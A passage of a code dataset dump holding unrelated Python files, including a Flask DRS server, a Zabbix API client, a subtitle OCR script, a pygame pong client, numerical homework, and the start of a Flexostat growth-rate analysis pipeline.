os\nimport sys\nfrom flask import render_template\n\nsys.path.append(\"/var/www/wsgi-scripts/\")\n\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.DEBUG)\nf_handler = logging.FileHandler(\"/tmp/drs_app.log\")\nf_handler.setLevel(logging.DEBUG)\nf_format = logging.Formatter(\"%(asctime)s - %(name)s - %(levelname)s - %(message)s\")\nf_handler.setFormatter(f_format)\nlogger.addHandler(f_handler)\n\nif \"NCBI_LOGGER\" in os.environ:\n from ncbi import logger\n\n logger.addHandler()\n\n\nlogger.info(f\"logging started: {__name__}\")\n# logging.basicConfig(level=logging.INFO)\n\n# Create the application instance\noptions = {\n \"serve_spec\": False, # Don't show spec JSON\n \"swagger_ui\": False,\n} # Don't show swagger console\n\nos.environ[\"APIKEYINFO_FUNC\"] = \"ga4gh.drs.server.apikey_auth\"\n\napp = connexion.App(__name__, options=options, specification_dir=\"./openapi\")\n\n# Read the swagger.yml file to configure the endpoints\n# TODO: validate=True\napp.add_api(\"data_repository_service.swagger.yaml\", strict_validation=True)\n\napplication = app.app\n\n\n# Create a URL route in our application for \"/\"\n@app.route(\"/\")\ndef home():\n \"\"\"\n This function just responds to the browser URL\n localhost:5000/\n :return: the rendered template 'home.html'\n \"\"\"\n username = \"Apache\" # getpass.getuser()\n logger.info(f\"Got {username}\")\n logger.info(f\"headers is {connexion.request.headers}\")\n logger.info(f\"params is {connexion.request.json}\")\n logger.info(f\"query is {connexion.request.args}\")\n # connexion.request.method\n return render_template(\"home.html\", title=\"DRS\", username=username)\n\n\n# --------------------- proxy\nfrom ga4gh.drs.proxy import do_proxy\n\n\n@app.route(\"/proxy/\")\ndef proxy(shortID):\n return do_proxy(shortID)\n\n\n# ---------------------\n\n# If we're running in stand alone mode, run the application\nif __name__ == \"__main__\":\n logger.info(\"in main\")\n app.run(port=20814, debug=True)\n","sub_path":"files/var/www/wsgi-scripts/drs.py","file_name":"drs.py","file_ext":"py","file_size_in_byte":3239,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"3758326","text":"import json\nimport requests\nimport configparser\nimport arrow\nfrom urllib.parse import urlparse\n\n\nclass ZabbixApi(object):\n def __init__(self, configfile):\n self.config = configparser.ConfigParser()\n self.config.read(configfile)\n try:\n self.config.get(\"defaults\", \"zbxver\")\n self.zbxver = self.config.get(\"defaults\", \"zbxver\")\n self.zbxusr = self.config.get(\"defaults\", \"zbxusr\")\n self.zbxpwd = self.config.get(\"defaults\", \"zbxpwd\")\n self.zbxurl = self.config.get(\"defaults\", \"zbxurl\")\n self.conector = self.config.get(\"canopsis\", \"connector\")\n self.conectorname = self.config.get(\"canopsis\", \"connector_name\")\n except configparser.NoSectionError and configparser.NoOptionError:\n print(\"Config File error !\")\n exit(1)\n parsedurl = urlparse(self.zbxurl)\n self.component = parsedurl.netloc.replace(\".\", \"-\")\n jauth = {\n \"jsonrpc\": \"2.0\",\n \"method\": \"user.login\",\n \"params\": {\n \"user\": self.zbxusr,\n \"password\": self.zbxpwd\n },\n \"id\": 1\n }\n httptoken = requests.post(self.zbxurl, json=jauth)\n if httptoken.status_code != 404:\n authkey = httptoken.json()\n else:\n print(\"url not found - http status {}\".format(httptoken.status_code))\n exit(1)\n self.zbxtoken = authkey[\"result\"]\n self.zbxid = authkey[\"id\"]\n\n def ZbxGetItem(self, triggerid):\n itemdict = {\n \"jsonrpc\": \"2.0\",\n \"method\": \"item.get\",\n \"params\": {\n \"output\": \"extend\",\n \"triggerids\": triggerid\n },\n \"auth\": self.zbxtoken,\n \"id\": self.zbxid\n }\n httpresp = requests.post(self.zbxurl, json=itemdict)\n itemjson = httpresp.json()\n try:\n zbxitem = itemjson[\"result\"][0][\"name\"]\n except IndexError:\n zbxitem = None\n return zbxitem\n\n def ZbxLastEvent(self):\n curts = arrow.now().shift().timestamp\n ltsts = arrow.now().shift(minutes=-1).timestamp\n jevent = {\n \"jsonrpc\": \"2.0\",\n \"method\": \"trigger.get\",\n \"params\": {\n \"output\": \"extend\",\n \"selectHosts\": \"\",\n \"lastChangeSince\": ltsts,\n \"lastChangeTill\": curts\n },\n \"auth\": self.zbxtoken,\n \"id\": self.zbxid\n }\n #print(json.dumps(jevent,indent=4))\n httpevent = requests.post(self.zbxurl, json=jevent)\n httpevent = httpevent.json()\n return httpevent[\"result\"]\n\n def ZbxGetHost(self, hostid):\n hostdict = {}\n jhost = {\n \"jsonrpc\": \"2.0\",\n \"method\": \"host.get\",\n \"output\": [\n \"hostid\",\n \"host\"\n ],\n \"params\": {\n \"hostids\": hostid,\n \"selectInterfaces\": [\n \"ip\"\n ]\n },\n \"auth\": self.zbxtoken,\n \"id\": self.zbxid\n }\n #print(json.dumps(jhost))\n hostreq = requests.post(self.zbxurl, json=jhost)\n jresp = hostreq.json()\n #print(json.dumps(jresp, indent=4))\n hostdict[\"name\"] = jresp[\"result\"][0][\"host\"]\n hostdict[\"ip\"] = jresp[\"result\"][0][\"interfaces\"][0][\"ip\"]\n return hostdict\n\n def ZbxHostEvent(self):\n resultlst = self.ZbxLastEvent()\n event = []\n for item in resultlst:\n hostid = item[\"hosts\"][0][\"hostid\"]\n hostvalue = item[\"value\"]\n hostdescrp = item[\"description\"]\n hostdict = self.ZbxGetHost(hostid)\n hostname = hostdict[\"name\"]\n hostip = hostdict[\"ip\"]\n resource = self.ZbxGetItem(item[\"triggerid\"])\n hostevent = {\n \"connector\": self.conector,\n \"connector_name\": self.conectorname,\n \"event_type\": \"check\",\n \"source_type\": \"resource\",\n \"component\": hostname,\n \"resource\": resource,\n \"address\": hostip,\n \"output\": hostdescrp,\n \"state\": hostvalue,\n \"timestamp\": arrow.now().shift().timestamp\n }\n event.append(hostevent)\n return event\n\n def __call__(self, *args, **kwargs):\n return self.ZbxHostEvent()","sub_path":"lib/zabbix2canopsis.py","file_name":"zabbix2canopsis.py","file_ext":"py","file_size_in_byte":4455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"25823740","text":"'''\nDescription:\nAuthor: Hejun Jiang\nDate: 2020-11-19 14:54:17\nLastEditTime: 2020-11-23 15:02:30\nLastEditors: Hejun Jiang\nVersion: v0.0.1\nContact: jianghejun@hccl.ioa.ac.cn\nCorporation: hccl\n'''\n# -*- coding: utf-8 -*-\nimport os\nimport time\nimport cv2 # BGR\nimport shutil\nimport numpy as np\nfrom config import *\nfrom PIL import Image # RGB\nfrom model import text_predict, crnn_handle\nfrom difflib import SequenceMatcher\nfrom apphelper.image import base64_to_PIL\n\n\ndef strdiff(str1, str2):\n return SequenceMatcher(None, str1, str2).ratio()\n\n\ndef conut_chinese(strs):\n n = 0\n for _char in strs:\n if '\\u4e00' <= _char <= '\\u9fa5':\n n += 1\n if n >= SubMinLen:\n return True\n return False\n\n\ndef GetSubImg(img):\n hight = img.shape[0]\n width = img.shape[1]\n subtitleimg = img[int(\n hight * SubUpRatio): int(hight * SubBottomRatio), int(\n width * SubLeftRatio): int(width * SubRightRatio)]\n return subtitleimg\n\n\ndef GetSrtFromVideo(VideoDir, JumpFrame=0, isSaveImg=False):\n dirname = os.path.dirname(VideoDir)\n basename = os.path.basename(VideoDir)\n video = cv2.VideoCapture(VideoDir)\n fps = video.get(cv2.CAP_PROP_FPS) # fps\n framenum = video.get(cv2.CAP_PROP_FRAME_COUNT) # frame number\n totaltime = framenum / fps # video length, s\n srtpath = os.path.join(\n dirname, basename.split('.')[0] + '.srt')\n saveimgdir = os.path.join(\n dirname, basename.split('.')[0])\n if os.path.exists(srtpath):\n os.remove(srtpath)\n if os.path.isdir(saveimgdir):\n shutil.rmtree(saveimgdir)\n os.makedirs(saveimgdir)\n print('video path:', VideoDir)\n print('srt path:', srtpath)\n print('total frame num:%d,' % framenum, 'fps:%d' %\n fps, 'timeLen:%.2fs' % totaltime)\n\n idx = 0\n result = []\n while True:\n success, img = video.read()\n milltime = video.get(cv2.CAP_PROP_POS_MSEC)\n if not success:\n break\n idx += 1\n if idx % (JumpFrame + 1) != 0:\n continue\n subimg = GetSubImg(img)\n text = crnn_handle.predict(Image.fromarray(\n subimg).convert(\"RGB\").convert('L')) # 识别的文本\n result.append([text, milltime])\n print('text:', text)\n print('get results done, result length:', len(result))\n\n # f = open('./temp.txt', 'w', encoding='utf-8')\n # for item in result:\n # f.write(item[0] + ' || ' + str(item[1]) + '\\n')\n # f.close()\n\n # f = open('./temp.txt', 'r', encoding='utf-8')\n # lis = f.readlines()\n # f.close()\n # result = []\n # for line in lis:\n # l = line.split(' || ')\n # result.append([l[0], float(l[1])])\n\n i = 0 # result的开始\n idx = 1\n while True:\n if i >= len(result):\n break\n if conut_chinese(result[i][0]):\n start = result[i]\n print('start:', start)\n # 从start idx开始之后的SubMaxTime秒,包括start idx在内的SubMaxTime秒张图\n rlist = list(reversed(result[i: int(SubMaxTime * fps + i)]))\n\n for j, ritem in enumerate(rlist):\n if conut_chinese(ritem[0]) and strdiff(ritem[0], start[0]) >= SimilarThreshold:\n end = ritem\n fakei = i + (len(rlist) - j - 1)\n if result[fakei][1] - result[i][1] >= DiffTime*1000:\n fp = open(srtpath, 'a+', encoding='gb2312') # chinese\n fp.write(str(idx) + '\\n')\n fp.write(time.strftime(\"%H:%M:%S\", time.localtime(start[1]/1000)) + ',' + str(int(start[1] % 1000)) +\n ' --> ' + time.strftime(\"%H:%M:%S\", time.localtime(end[1]/1000)) + ',' + str(int(end[1] % 1000)) + '\\n')\n fp.write(start[0] + '\\n\\n')\n fp.close()\n idx += 1\n i = fakei # 满足条件,比较长时间\n break # 匹配完成一次就退出\n i += 1\n\n\ndef videosDetect():\n '''for videos detect'''\n vtype = ['mp4', 'mkv']\n t = time.time()\n videosdir = './test_videos/'\n for dirpath, dirname, dirfile in os.walk(videosdir):\n for file in dirfile:\n if file.split('.')[-1] in vtype:\n GetSrtFromVideo(VideoDir=os.path.join(\n dirpath, file), JumpFrame=1, isSaveImg=True)\n print('total spend time:%d s\\n' % (time.time() - t))\n\n\ndef imagesDetect():\n '''for images detect'''\n imgtype = ['png', 'jpg', 'jpeg']\n t = time.time()\n imgdir = './test_imgs/'\n for dirpath, dirname, dirfile in os.walk(imgdir):\n for file in dirfile:\n if file.split('.')[-1] in imgtype:\n t = time.time()\n fp = open(os.path.join(\n dirpath, file.split('.')[0] + '.txt'), 'w', encoding='utf-8')\n filepath = os.path.join(dirpath, file)\n print(filepath, ':')\n fp.write(filepath + ':\\n')\n img = np.array(Image.open(filepath).convert('RGB'))\n result = text_predict(img)\n text = ' '.join([i['text'] for i in result])\n print('text:', text)\n for n, dic in enumerate(result):\n fp.write('line%d:' % n + str(dic) + '\\n')\n timeTake = time.time() - t\n print('recog spend time:%d s' % timeTake)\n fp.write('recog spend time:%d s' % timeTake + '\\n')\n fp.close()\n print('total spend time:%d s\\n' % (time.time() - t))\n\n\nif __name__ == '__main__':\n videosDetect()\n # imagesDetect()\n","sub_path":"GetSrt.py","file_name":"GetSrt.py","file_ext":"py","file_size_in_byte":5677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"194566796","text":"\"\"\"\nCreate data to study overfitting\n\"\"\"\n\nimport matplotlib.pyplot as plt\nimport csv\nimport numpy as np\n\nfile_name = 'noisy_data.csv'\n\ninputs = np.random.uniform(-100, 100, 100)\n# print(x)\n# create data with random noise\noutputs = [(0.2*(x-40))**3+(x-40)**2 + 500 * np.random.rand() for x in inputs]\n\n\nwith open(file_name, 'w') as csvfile:\n filewriter = csv.writer(csvfile, delimiter=',')\n for point in range(len(inputs)):\n filewriter.writerow([inputs[point], outputs[point]])\n\n\ntitle = 'Noisy data'\nfile = 'data_to_fit.pdf'\nplt.plot(inputs, outputs, 'o')\nplt.xlabel('input')\nplt.ylabel('output')\nplt.title(title)\nplt.savefig('images/' + file)\n","sub_path":"code/overfitting/create_data.py","file_name":"create_data.py","file_ext":"py","file_size_in_byte":657,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"451325960","text":"# -*- coding: utf-8 -*-\n#NÃO APAGUE A LINHA ACIMA. COMECE ABAIXO DESTA LINHA\n#ENTRADA\nn = int(input('Digite o valor de n: '))\nnum = 2\nden = 1\ncont = 1\nmult = 1\n#PROCESSAMENTO\nwhile (cont<=n) :\n mult = mult*(num/den)\n if (num/den) > 1 :\n den = den+2\n elif (num/den) < 1 :\n num = num+2\n cont = cont+1\npi = mult*2\nprint('O valor de pi é %.5f : ' % pi)\n","sub_path":"moodledata/vpl_data/195/usersdata/271/74585/submittedfiles/al10.py","file_name":"al10.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"422730065","text":"# g(x) = x^2 +x-4. Suppose there is a small error, h in the value of x.\ndef g_abs_err(x, h):\n \"\"\"Returns the absolute error of computing `g` at `x` if `x` is\n perturbed by a small value `h`.\n \"\"\"\n\n return abs(-h ** 2 - 2 * x * h - h)\n\n\ndef g_rel_err(x, h):\n \"\"\"Returns the relative error of computing `g` at `x` if `x` is\n perturbed by a small value `h`.\n \"\"\"\n abs_error = g_abs_err(x, h)\n return abs_error / (x ** 2 + x - 4)\n\n\n# g(x) = x^2 +x+c\ndef g_root_abs_err(c, h):\n \"\"\"Returns the absolute error of finding the (most) positive root of `g` when\n `c` is perturbed by a small value `h`.\n \"\"\"\n\n return abs(-np.sqrt(1 - 4 * c) + np.sqrt(1 - 4 * c - 4 * h)) / 2\n\n\ndef g_root_rel_err(c, h):\n \"\"\"Returns the relative error of finding the (most) positive root of `g` when\n `c` is perturbed by a small value `h`.\n \"\"\"\n abs_err = g_root_abs_err(c, h)\n actural = -(-1 + np.sqrt(1 - 4 * c)) / 2\n return abs_err / actural\n\n\n# q2 start----------------------------------------------------------------------\n# q2 start----------------------------------------------------------------------\nimport matplotlib.pyplot as plt\nimport math\nimport numpy as np\n\n\ndef f(x):\n return (x - math.sin(x)) / math.pow(x, 3)\n\n\ndef plot_f():\n xs = [x for x in np.arange(-3.0, 3.0, 0.05) if abs(x) > 0.05]\n ys = [f(x) for x in xs]\n plt.plot(xs, ys, 'bo')\n plt.show()\n\n\nx = 0.00000001\nq2_est = f(x)\nfirst = 1 / x ** 2\nsecond = - math.sin(x) / math.pow(x, 1)\nq2_true = first + second\nfrom decimal import *\n\n\ndef f2(x):\n \"\"\"\n I use Maclaurin expansion (the Taylor expansion about 0)\n \"\"\"\n\n bigger = 1 / math.pow(x, 3)\n # localcontext().prec = 100\n summ = Decimal(x * bigger)\n\n i = 2\n flag = 2\n while i < 1000:\n fac = Decimal(math.factorial(i))\n if flag % 2 == 0:\n summ -= Decimal(math.pow(x, i)) * Decimal(bigger) / fac\n else:\n summ += Decimal(math.pow(x, i)) * Decimal(bigger) / fac\n i += 2\n flag += 2\n return summ\n\n\n# q3 start----------------------------------------------------------------------\n# q3 start----------------------------------------------------------------------\nxs = [0.1, 0.5, 1.0, 3.0]\nq3_forward = [None, None, None, None]\nq3_backward = [None, None, None, None]\n\ntrue_value = [math.sin(i) for i in xs]\n\ndef function(x):\n return x - math.pow(x, 3) / math.factorial(3)\nfor i in range(4):\n q3_forward[i] = true_value[i] - function(xs[i])\n q3_backward[i] = \"DNE\"\n","sub_path":"csc338/A1/hw1.py","file_name":"hw1.py","file_ext":"py","file_size_in_byte":2516,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"363795623","text":"import pandas as pd\nimport numpy as np\nimport time\nfrom sklearn.cluster import KMeans\nimport pickle\nimport io\nimport matplotlib.pyplot as plt\n\nt0 = time.time()\nprint(\"creating table.\")\ntable = pd.read_excel('Serviceorderhistorik.xlsx',\n\t\t\t\t\t\tsheetname = 'Jobhist',\n\t\t\t\t\t\theader = 0,\n\t\t\t\t\t\tindex_col = None,\n\t\t\t\t\t\tparse_cols = \"X, N\",\n\t\t\t\t\t\tconvert_float = False)\n\nprint(\"table created.\")\narray = np.array(table)\narray = array.astype(int)\nprint(\"table converted to numpy int-array\")\nprint(\"Det tog {} sekunder att skapa datastrukturen.\".format(time.time()-t0))\nt0 = time.time()\narray = np.array(table).astype(int)\nplt.plot(array)\nplt.ylabel(\"things\")\nplt.show()\nprint(\"Det tog {} sekunder att skapa numpyarrayen.\".format(time.time()-t0))\npickle.dump(array, io.open(\"pkl.p\", \"wb+\"))\nprint(\"Det tog {} sekunder att skapa pickle-filen.\".format(time.time()-t0))\n\nclusterer = KMeans()\nprint(\"fitting data...\")\nt0 = time.time()\nclusterer.fit(array)\nprint(\"data fitted in {} seconds!\".format(time.time()-t0))\n\n# A - Postnr.\n# B - Kundnr.\n# C - Kostnad","sub_path":"Code/excelToNumpyToPickle.py","file_name":"excelToNumpyToPickle.py","file_ext":"py","file_size_in_byte":1043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"377965417","text":"\"\"\"\nExample of using the spectral clustering function of scikit-learn in order\nto segment glued objects.\n\"\"\"\n\nfrom sklearn.feature_extraction import image\nfrom sklearn.cluster import spectral_clustering\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nl = 100\nx, y = np.indices((l, l))\n\n# Image contains 4 circles\ncenter1 = (28, 24)\ncenter2 = (40, 50)\ncenter3 = (67, 58)\ncenter4 = (24, 70)\nradius1, radius2, radius3, radius4 = 16, 14, 15, 14\n\ncircle1 = (x - center1[0])**2 + (y - center1[1])**2 < radius1**2\ncircle2 = (x - center2[0])**2 + (y - center2[1])**2 < radius2**2\ncircle3 = (x - center3[0])**2 + (y - center3[1])**2 < radius3**2\ncircle4 = (x - center4[0])**2 + (y - center4[1])**2 < radius4**2\n\nimg = circle1 + circle2 + circle3 + circle4\n\n# Creating mask\nmask = img.astype(bool)\nimg = img.astype(float)\nimg += 1 + 0.2 * np.random.randn(*img.shape)\n\n# Convert the image into a graph with the value of the gradient on the edges.\ngraph = image.img_to_graph(img, mask=mask)\n\n# Take a decreasing function of the gradient: we take it weakly\n# dependent from the gradient the segmentation is close to a voronoi\ngraph.data = np.exp(-graph.data/graph.data.std())\n\n# Applying spectral clustering\nlabels = spectral_clustering(graph, n_clusters=4, eigen_solver='arpack')\nlabel_im = -np.ones(mask.shape)\nlabel_im[mask] = labels\n\n# Plotting results side by side\nplt.figure(figsize=(11,4))\n\nplt.subplot(121)\nplt.imshow(img)\nplt.axis('off')\n\nplt.subplot(122)\nplt.imshow(label_im)\nplt.axis('off')\n\nplt.show()","sub_path":"image_processing/spectral_clustering.py","file_name":"spectral_clustering.py","file_ext":"py","file_size_in_byte":1504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"367503448","text":"import pygame,json\nfrom networking import communicate\nfrom threading import Thread\n\nPLAYER1_IP = '127.0.0.1'\nNAME = 'XYZ'\n\n\n\nHEIGHT = 500\nWIDTH = 500\nWHITE = (255,255,255)\nBLUE = (0,0,255)\n\n\n\nclass Player2(pygame.sprite.Sprite):\n def __init__(self):\n super().__init__()\n self.height = 70\n self.width = 10\n self.image = pygame.Surface([self.width,self.height])\n self.image.fill(WHITE)\n self.rect = self.image.get_rect()\n self.rect.x = WIDTH-self.width\n self.rect.y = 100\n self.is_alive = True\n def update(self):\n x, y = pygame.mouse.get_pos()\n self.rect.y = y\n\nclass Ball(pygame.sprite.Sprite):\n def __init__(self,WIDTH,HEIGHT):\n self.WIDTH = WIDTH\n self.HEIGHT = HEIGHT\n super().__init__()\n self.image = pygame.Surface([10,10])\n self.image.fill(BLUE)\n self.rect = self.image.get_rect()\n self.rect.x = WIDTH/2\n self.rect.y = HEIGHT/2\n\n\nplayer2 = Player2() \nball = Ball(WIDTH,HEIGHT)\n\nclass Player1(pygame.sprite.Sprite):\n def __init__(self,ip_address,name):\n self.ip_address = ip_address\n self.com = communicate((ip_address,12345),name,12346)\n super().__init__()\n self.height=70\n self.width = 10\n self.image = pygame.Surface([self.width,self.height])\n self.image.fill(WHITE)\n self.rect = self.image.get_rect()\n self.rect.x = 0\n self.rect.y = 100\n self.is_alive = True\n self.data = dict()\n\n self.com.createConnection()\n if self.com.is_connected:\n print(\"connected to player 1\",self.com.get_connection_status()[0])\n else:\n self.com.closeconnection()\n print(\"unable to connect\")\n def handle_client(self):\n running = True\n\n while running:\n if not self.com.is_connected:\n print(\"out of network thread\")\n running = False\n if self.com.is_connected:\n\n json_string = self.com.get_data()\n self.data = json.loads(json_string)\n self.rect.y = self.data['y']\n ball.rect.x,ball.rect.y = self.data['ball']\n self.is_alive = self.data['p1_alive']\n player2.is_alive = self.data['p2_alive']\n \n self.data = dict()\n self.data['y'] = player2.rect.y\n json_string = json.dumps(self.data)\n self.com.send_data(json_string)\n \n def start_network_thread(self):\n thread = Thread(target=self.handle_client)\n print(\"starting network thread\")\n thread.start()\n\nplayer1 = Player1(PLAYER1_IP,NAME)\nBLACK = (0,0,0)\n\npygame.init()\ndisplay = pygame.display.set_mode((WIDTH,HEIGHT))\npygame.display.set_caption(\"ping pong client!\")\nclock = pygame.time.Clock()\n\n\n\n\n\n\nall_sprites = pygame.sprite.Group()\nall_sprites.add(player1)\nall_sprites.add(player2)\nall_sprites.add(ball)\n\nrunning =True\nplayer1.start_network_thread()\nwhile running:\n for event in pygame.event.get():\n if event.type==pygame.QUIT:\n running = False \n\n display.fill(BLACK) \n all_sprites.update()\n \n all_sprites.draw(display)\n pygame.display.flip()\n clock.tick(30)\n\n if not player1.is_alive:\n print(\"player 1 looses the game\")\n running = False\n elif not player2.is_alive:\n print(\"player 2 looses the game\")\n running = False\n\nplayer1.com.closeconnection()\npygame.quit()\nquit()","sub_path":"multiplayer/multiplayer_client.py","file_name":"multiplayer_client.py","file_ext":"py","file_size_in_byte":3531,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"47479720","text":"\"\"\"Computes centered kernel alignment to measure similarity between layers\nRefer to this also - https://arxiv.org/pdf/1905.00414.pdf\n\"\"\"\n\nimport numpy as np\nimport torch\n\n\ndef np_center_kernel(K, copy=True):\n '''\n Centered version of a kernel matrix (corresponding to centering the)\n implicit feature map.\n '''\n means = K.mean(axis=0)\n if copy:\n K = K - means[None, :]\n else:\n K -= means[None, :]\n K -= means[:, None]\n K += means.mean()\n return K\n\n\ndef np_alignment(K1, K2):\n '''\n Returns the kernel alignment\n _F / (||K1||_F ||K2||_F)\n defined by\n Cristianini, Shawe-Taylor, Elisseeff, and Kandola (2001).\n On Kernel-Target Alignment. NIPS.\n Note that the centered kernel alignment of\n Cortes, Mohri, and Rostamizadeh (2012).\n Algorithms for Learning Kernels Based on Centered Alignment. JMLR 13.\n is just this applied to center_kernel()s.\n '''\n return np.sum(K1 * K2) / np.linalg.norm(K1) / np.linalg.norm(K2)\n\n\ndef center_kernel(X, copy=True):\n '''\n Centered version of a kernel matrix (corresponding to centering the)\n implicit feature map.\n '''\n means = X.mean(axis=0)\n if copy:\n X = X - means[None, :]\n else:\n X -= means[None, :]\n X -= means[:, None]\n X += means.mean()\n return X\n\n\ndef alignment(x, y): return torch.sum(x * y) / torch.norm(x) / torch.norm(y)\n\n\ndef test_alignment(x=None, y=None, nump=False):\n if x is None and y is None:\n x = torch.randn((100, 10))\n y = torch.randn((100, 10))\n y = y.t()\n print(alignment(x, y))\n if nump:\n print(np_alignment(x.numpy(), y.numpy()))\n\n\nif __name__ == \"__main__\":\n\n test_alignment(nump=True)","sub_path":"util/metrics/kernel.py","file_name":"kernel.py","file_ext":"py","file_size_in_byte":1732,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"338100513","text":"\n\"\"\"\nBACKGROUND\n\n\tCreated January 31, 2018\n\t\tby David Klein, using previous code from Maxwell Raderstorf\n\t\tcontributions found at https://github.com/Siegallab/Flexostat-interface\n\tAn open source feature contribution to the Klavins Lab Flexostat project\n\t\tproject found at https://github.com/Flexostat/Flexostat-interface\n\nINSTRUCTIONS\n\n\tRun using Python 3 on the command line as such\n\t$ python3 Growth-Pipe.py -h\n\"\"\"\n\nimport numpy\nimport matplotlib.pyplot as plt\nimport pandas\nimport os\nimport argparse\nimport warnings\nimport csv\nimport math\nfrom math import log10\nfrom datetime import datetime\n\ndef main():\n\t\"\"\"\n\tDefines the command line arguments intaken by the program.\n\tEnsures there is a config file to work with before calling the 'functions' function.\n\t\"\"\"\n\t# Allows warnings from divide by zero or log/ln negative number to be caught in try except\n\twarnings.filterwarnings('error')\n\targs = command_line_parameters()\n\n\tif os.path.exists(args.config):\n\t\tpaths, process_log, exp = config_variables(args)\n\t\tprocess_log = functions(args, paths, process_log, exp)\n\t\t# print and save process log\n\t\tlog_functions(args, process_log, exp)\n\telse:\n\t\tprint('ERROR: Config file not found.')\n\tprint('Program end.\\n')\n\n\ndef command_line_parameters():\n\t\"\"\"\n\tTakes in command line argument parameters and displays help descriptions.\n\n\t:return: variable containing all command line argument parameters\n\t\"\"\"\n\tparser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter,\n\t\t\t\t\tdescription=\"\"\"\n\t\t\tGrowth Rate Analysis Pipeline\n\t\t\t-----------------------------\n\t\t\tSelect at least one data set: --u, --od\n\t\t\tSelect at least one function: --parse (-p), --odlog,\n\t\t\t\t\t--rate (-r), --stats, --r_stats, --graph\n\n\t\t\tOptional changes: --config, --log (-l), --print\n\t\t\tOptional stats parameters: --block (-b) or --interval (-i)\n\t\t\tOptional graph parameters: --xlim (-x), --ylim (-y), --sd, --se\n\t\t\t\t\t\t\"\"\")\n\n\tparser.add_argument('--u', action='store_true', help='specify dilutions data set')\n\tparser.add_argument('--od', action='store_true', help='specify optical density data set')\n\n\tparser.add_argument('-p', '--parse', action='store_true', help='parse log file into clean data set')\n\tparser.add_argument('--odlog', action='store_true', help='parse odlog file into clean data set')\n\tparser.add_argument('-r', '--rate', action='store_true', help='calculate growth rate from data set')\n\tparser.add_argument('--stats', action='store_true', help='calculate mean, SD, and SE from data set')\n\tparser.add_argument('--r_stats', action='store_true', help='calculate mean, SD, and SE from growth rates of data set')\n\tparser.add_argument('--graph', default='0', help=\"graph specified data: 1 for main u/od, 2 for main stats, 3 for growth rates,\" + \n\t\t\t\t\" 4 for growth stats (e.g. '--graph 1234' for all)\")\n\n\tparser.add_argument('-i', '--interval', default='1',\n\t\t\t\t\t\thelp=\"modify default hour time interval for stats by multiplication (e.g. '-i 0.5' = 30 min, '-i 2' = 2 hrs)\")\n\tparser.add_argument('-b', '--block', action='store_true', help='specify separation of statistics based on block dilutions')\n\tparser.add_argument('--sd', action='store_true', help='display standard deviation bars on graphs')\n\tparser.add_argument('--se', action='store_true', help='display standard error bars on graphs')\n\t# parser.add_argument('--ci', action='store_true', help='display confidence interval bars on graphs')\n\tparser.add_argument('-x', '--xlim', default='0-0', help=\"limit data to upper and lower bound x (e.g. '-x 5-10')\")\n\tparser.add_argument('-y', '--ylim', default='0-0', help=\"limit data to upper and lower bound y (e.g. '-y 5-10')\")\n\tparser.add_argument('--config', default='config-growth.csv',\n\t\t\t\t\t\thelp=\"change config file from default 'config-growth.csv'\")\n\tparser.add_argument('-l', '--log', action='store_true', help='optional save program processes to log text file')\n\tparser.add_argument('--print', action='store_true', help='optional program processes printing')\n\n\targs = parser.parse_args()\n\treturn args\n\n\ndef config_variables(args):\n\t\"\"\"\n\tReads in variables from config file for growth pipe, ensures directories exist, and starts log for program processes.\n\n\t:param args: list of command line arguments\n\t:return: list with config file paths and log with program processes\n\t\"\"\"\n\t# begin log to keep track of program processes\n\t# read in config file and save all config variables to local variables in a dictionary\n\tprocess_log = '\\n[Growth-Pipe] ' + datetime.now().strftime(\"%Y-%m-%d %H:%M\")\n\tpaths = {\n\t\t# general local variables\n\t\t'' : '', 'log file' : '', 'odlog' : '', 'blank' : '', 'block' : '',\n\t\t'log processes' : '', 'data directory' : '', 'experiment' : '', \n\t\t# dilution local variables\n\t\t'u' : '', 'u statistics' : '', 'u machine time' : '',\n\t\t'u growth rates' : '', 'u growth statistics' : '',\n\t\t# optical density local variables\n\t\t'od' : '', 'u statistics' : '', 'od machine time' : '', \n\t\t'od growth rates' : '', 'od growth statistics' : '',\n\t\t# dilution graph local variables\n\t\t'u graphs' : '', 'u statistics graphs' : '', 'u growth rates graphs' : '', 'u growth statistics graphs' : '',\n\t\t# optical density graph local variables\n\t\t'od graphs' : '', 'od statistics graphs' : '', 'od growth rates graphs' : '', 'od growth statistics graphs' : ''\n\t}\n\twith open(args.config) as config_file:\n\t\treader = csv.reader(config_file)\n\t\tfor row in reader:\n\t\t\t# removes any ending slashes that may exist in csv\n\t\t\tif row[1][-1] == '/':\n\t\t\t\trow[1] = row[1][:-1]\n\t\t\tpaths[row[0]] = row[1]\n\t\t\tif len(row[4]) >= 1:\n\t\t\t\tif row[4][-1] == '/':\n\t\t\t\t\trow[4] = row[1][:-1]\n\t\t\tpaths[row[3]] = row[4]\n\tconfig_file.close()\n\n\t# ensure data and experiment directories exist\n\t# format paths to variable appropriately\n\tif paths['experiment'][-1] == \"'\":\n\t\tpaths['experiment'] = paths['experiment'][:-1]\n\tif os.path.exists(paths['data directory']):\n\t\tprocess_log += '\\nData directory found.'\n\telse:\n\t\tos.system(\"mkdir '{}'\".format(paths['data directory']))\n\t\tprocess_log += '\\nData directory not found. Made new one.'\n\texp = '{}/{}/'.format(paths['data directory'], paths['experiment'])\n\tif os.path.exists(exp):\n\t\tprocess_log += '\\nExperiment directory found.'\n\telse:\n\t\tos.system(\"mkdir '{}'\".format(exp))\n\t\tprocess_log += '\\nExperiment directory not found. Made new 